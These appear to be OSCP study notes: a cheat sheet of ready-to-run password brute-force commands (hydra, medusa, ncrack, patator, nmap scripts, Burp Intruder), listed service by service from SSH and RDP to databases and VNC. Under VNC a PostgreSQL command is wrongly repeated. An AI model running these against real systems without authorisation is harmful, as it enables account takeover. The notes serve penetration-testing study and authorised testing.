OSCP Notes
Brute-force service password

Web

hydra 10.0.0.1 http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin

Logins

Use Burp Suite.
    1.
    Intercept a login attempt.
    2.
    Right-click "Send to intruder". Select Sniper if you have only one field you want to brute-force (for example, if you already know the username); otherwise select cluster-attack.
    3.
    Select your payload, your wordlist.
    4.
    Click attack.
    5.
    Look for response-length that differs from the rest.

HTTP Generic Brute

wfuzz

HTTP Basic Auth

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10

HTTP - Post Form

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V

HTTP - CMS -- (W)ordPress, (J)oomla, (D)rupal or (M)oodle

cmsmap -f W/J/D/M -u a -p a https://wordpress.com

Hydra attack on an HTTP GET (401) login with a dictionary

hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin

SSH

hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt ssh://$ip
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh
hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh
hydra -l root -P wordlist.txt $ip ssh
hydra -L userlist.txt -P best1050.txt $ip -s 22 ssh -V
hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh

SNMP

hydra -P wordlist.txt -v $ip snmp
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp_onesixtyone.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp

Remote Desktop Protocol

ncrack -vv --user admin -P password-file.txt rdp://$ip
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip

AFP

nmap -p 548 --script afp-brute <IP>

AJP

nmap --script ajp-brute -p 8009 <IP>

Cassandra Apache

nmap --script cassandra-brute -p 9160 <IP>

CouchDB

msf> use auxiliary/scanner/couchdb/couchdb_login

FTP

hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp

IMAP

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>

IRC

nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>

ISCSI

nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>

LDAP

nmap --script ldap-brute -p 389 <IP>
hydra -L users.txt -P passwords.txt $ip ldap2 -V -f

Mongo

nmap -sV --script mongodb-brute -n -p 27017 <IP>

MySQL

hydra -L usernames.txt -P pass.txt <IP> mysql

OracleSQL

pip3 install cx_Oracle --upgrade
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
john hashes.txt

POP3

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V

PostgreSQL

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M postgres
ncrack -v -U /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>

PPTP

cat rockyou.txt | thc-pptp-bruter -u <Username> <IP>

Redis

nmap --script redis-brute -p 6379 <IP>
hydra -P /path/pass.txt <IP> redis

Rexec

hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V

Rlogin

hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V

Rsh

hydra -L <Username_list> rsh://<Victim_IP> -v -V

Rsync

nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>

RTSP

hydra -l root -P passwords.txt <IP> rtsp

SMB

nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1

Telnet

hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet

VNC

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> -u root -P /root/Desktop/pass.txt -M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:<PORT>
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries 0 -x quit:code=0
msf> use auxiliary/scanner/vnc/vnc_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>

SMTP

hydra -P /usr/share/wordlists/nmap.lst $ip smtp -V